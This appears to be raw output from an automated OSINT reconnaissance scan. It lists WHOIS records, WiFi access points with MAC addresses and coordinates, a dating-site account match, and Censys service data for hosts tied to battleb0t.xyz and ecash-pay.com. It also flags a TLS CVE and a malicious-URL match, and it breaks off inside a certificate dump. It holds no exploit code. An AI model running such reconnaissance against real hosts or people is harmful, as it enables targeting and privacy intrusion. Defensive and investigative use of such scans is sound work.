Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | azis (Net ID: 00:06:B1:15:73:DD) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:42:54 | Affiliate - Domain Whois | No | Whois | 0 | 0 | 6 | 0 | None | % Restricted rights.
%
% Terms and Conditions of Use
%
% The above data may only be used within the scope of technical or
% administrative necessities of Internet operation or to remedy legal
% problems.
% The use for other purposes, in particular for advertising, is not permitted.
%
% The DENIC whois service on port 43 doesn't disclose any information concerning
% the domain holder, general request and abuse contact.
% This information can be obtained through use of our web-based whois service
% available at the DENIC website:
% http://www.denic.de/en/domains/whois-service/web-whois.html
%
%
Domain: domixo-hosting.de
Nserver: ns2.inwx.de
Nserver: ns3.inwx.eu
Nserver: ns.inwx.de
Status: connect
Changed: 2020-10-30T16:19:21+01:00
| domixo-hosting.de |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Tinder (Category: dating)
https://tinder.com/@login | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom2888 (Net ID: 00:01:38:85:BD:9E) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c59a6bfbf716314-ORD
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | registrar-abuse@cloudflare.com | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:53:02 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | nwapi.battleb0t.xyz |
| 2023-05-12 02:59:34 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | kekw.battleb0t.xyz |
| 2023-05-12 02:53:35 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.110.153:80 | 185.199.110.153 |
| 2023-05-12 03:00:59 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-108-153.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-108-153.github.com |
| 2023-05-12 02:44:14 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
